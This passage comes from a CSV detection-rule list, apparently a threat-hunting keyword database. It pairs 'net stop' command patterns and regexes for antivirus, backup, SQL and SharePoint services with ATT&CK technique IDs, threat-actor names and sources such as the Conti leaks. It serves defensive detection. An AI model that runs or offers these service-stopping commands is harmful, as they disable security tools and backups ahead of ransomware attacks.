APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop QuickBooksDB4*",".{0,1000}net\sstop\sQuickBooksDB4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop QuickBooksDB5*",".{0,1000}net\sstop\sQuickBooksDB5.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop ReportServer$ISARS*",".{0,1000}net\sstop\sReportServer\$ISARS.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - 
APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop sacsvr*",".{0,1000}net\sstop\ssacsvr.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop SAVAdminService*",".{0,1000}net\sstop\sSAVAdminService.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop SAVService*",".{0,1000}net\sstop\sSAVService.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat 
Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop shadowprotectsvc*",".{0,1000}net\sstop\sshadowprotectsvc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop ShadowProtectSvc*",".{0,1000}net\sstop\sShadowProtectSvc.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop 
sharedaccess*",".{0,1000}net\sstop\ssharedaccess.{0,1000}","greyware_tool_keyword","net","stopping shared access","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*net stop ShMonitor*",".{0,1000}net\sstop\sShMonitor.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop Smcinst*",".{0,1000}net\sstop\sSmcinst.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop SmcService*",".{0,1000}net\sstop\sSmcService.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop sms_site_sql_backup*",".{0,1000}net\sstop\ssms_site_sql_backup.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop SntpService* ",".{0,1000}net\sstop\sSntpService.{0,1000}\s\s\s\s","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - 
menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop sophossps*",".{0,1000}net\sstop\ssophossps.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop SPAdminV4*",".{0,1000}net\sstop\sSPAdminV4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop SPSearch4*",".{0,1000}net\sstop\sSPSearch4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - 
Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop SPTimerV4*",".{0,1000}net\sstop\sSPTimerV4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop SPTraceV4*",".{0,1000}net\sstop\sSPTraceV4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop SPUserCodeV4*",".{0,1000}net\sstop\sSPUserCodeV4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat 
Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop SPWriterV4*",".{0,1000}net\sstop\sSPWriterV4.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop spxservice*",".{0,1000}net\sstop\sspxservice.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop sqbcoreservice*",".{0,1000}net\sstop\ssqbcoreservice.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - 
TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop SQLAgent$ISARS*",".{0,1000}net\sstop\sSQLAgent\$ISARS.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop SQLAgent$MSFW*",".{0,1000}net\sstop\sSQLAgent\$MSFW.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop 
SQLAgent$SOPH",".{0,1000}net\sstop\sSQLAgent\$SOPH","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop SQLAgent$VEEAMSQL*",".{0,1000}net\sstop\sSQLAgent\$VEEAMSQL.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop SQLAgent$VEEAMSQL*",".{0,1000}net\sstop\sSQLAgent\$VEEAMSQL.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense 
Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop SQLBrowser*",".{0,1000}net\sstop\sSQLBrowser.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop SQLWriter*",".{0,1000}net\sstop\sSQLWriter.{0,1000}","greyware_tool_keyword","net","stop critical services","T1489","TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*net stop stc_endpt_svc*",".{0,1000}net\sstop\sstc_endpt_svc.{0,1000}","greyware_tool_keyword","net","stopping backup services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 
- APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop stop SepMasterService*",".{0,1000}net\sstop\sstop\sSepMasterService.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop svcGenericHost*",".{0,1000}net\sstop\ssvcGenericHost.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop swi_filter*",".{0,1000}net\sstop\sswi_filter.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - 
OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop swi_service*",".{0,1000}net\sstop\sswi_service.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop swi_update*",".{0,1000}net\sstop\sswi_update.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop 
swi_update_64*",".{0,1000}net\sstop\sswi_update_64.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop TmCCSF*",".{0,1000}net\sstop\sTmCCSF.{0,1000}","greyware_tool_keyword","net","stopping AV services","T1562.002 - T1489","TA0005 - TA0040","N/A","Naikon - Magic Hound - APT38 - Dragonfly - Deep Panda - Threat Group-3390 - OilRig - Threat Group-1314 - APT28 - APT41 - menuPass - Ke3chang - Leviathan - APT5 - Orangeworm - GALLIUM - admin@338 - Chimera - APT1 - FIN8 - TA505 - ToddyCat - Turla - APT33 - Wizard Spider - Sandworm Team - APT29 - APT32 - Volt Typhoon - BRONZE BUTLER","Defense Evasion","https://github.com/TheParmak/conti-leaks-englished/blob/45d49307f347aff10e0f088af25142f8929b4c4f/anonfile_dumps/31.txt#L236","1","0","N/A","N/A","10","6","582","140","2022-03-16T23:17:08Z","2022-02-28T06:56:06Z" "*net stop 